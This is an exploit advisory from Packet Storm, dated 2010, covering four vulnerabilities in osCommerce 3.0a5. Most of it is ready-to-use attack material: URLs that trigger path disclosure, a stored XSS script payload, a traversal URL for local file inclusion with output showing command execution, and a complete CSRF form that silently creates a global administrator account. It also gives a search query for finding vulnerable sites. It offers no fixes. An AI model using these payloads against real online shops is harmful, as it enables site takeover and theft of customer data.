osCommerce version 3.0a5 suffers from cross site request forgery, cross site scripting, local file inclusion and path disclosure vulnerabilities.
e9eb04d9da65ce5761cee17cec4dd104#
#
# Multiple Vulnerabilities in osCommerce
#
# [Vendor SW]: osCommerce
# [Version]: 3.0a5 (but possible all versions)
# [Vendor URL]: www.oscommerce.com
# [Tested on]: Ubuntu Server 9.10
# [Category]: Webapps/0day
#
# [Date]: 30 Apr 2010
# [Author]: Alberto Fontanella
# [Author WEB]: ictsec.wordpress.com
# [Author EMAIL]: itsicurezza<0x40>yahoo.it
#
#
# inText:"Powered by osCommerce" -> 6.850.000
#
#
[ 1 ] - [ Full Path Disclosure ]
http://[host]/templates/default/content/index/product_listing.php
http://[host]/templates/default/content/info/info_contact.php
...etc
Fatal error: Call to undefined function osc_image() in
/var/www/templates/default/content/index/product_listing.php on
line 16
http://[host]/includes/classes/search.php
...etc
Warning: require(includes/classes/products.php) [function.require]:
failed to open stream: No such file or directory in
/var/www/includes/classes/search.php on line 15
Fatal error: require() [function.require]: Failed opening required
'includes/classes/products.php'
(include_path='.:/usr/share/php:/usr/share/pear') in
/var/www/includes/classes/search.php on line 15
[ 2 ] - [ Persistent XSS ]
http://[host]/products.php?oscommerce-tshirt
Put in Front field: <script>alert("XSS")</script>
Click "Add to Cart"
Checkout section recalls XSS stored.
[ 3 ] - [ Local File Inclusion ]
http://[host]/admin/includes/applications/services/pages/uninstall.php?module=../../../../../../../../cmd
...etc
You have to put cmd.php in /
uid=33(www-data) gid=33(www-data) groups=33(www-data) Linux ubuntu
2.6.31-14-generic #48-Ubuntu SMP Fri Oct 16 14:04:26 UTC 2009 i686 GNU/Linux
[ 4 ] - [ XSRF ]
To create a new Administrator with Global Privileges:
<html>
<body>
<form action="http://[host]/admin/index.php?administrators&action=save" method="post">
<input type="text" name="user_name" value="haxor">
<input type="text" name="user_password" value="hax0r">
<input type="text" name="modules[]" value="0">
<input type="hidden" name="subaction" value="confirm"/>
<input type="submit" value="Save">
</form>
</body>
</html>
...etc
[ EOF ]
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!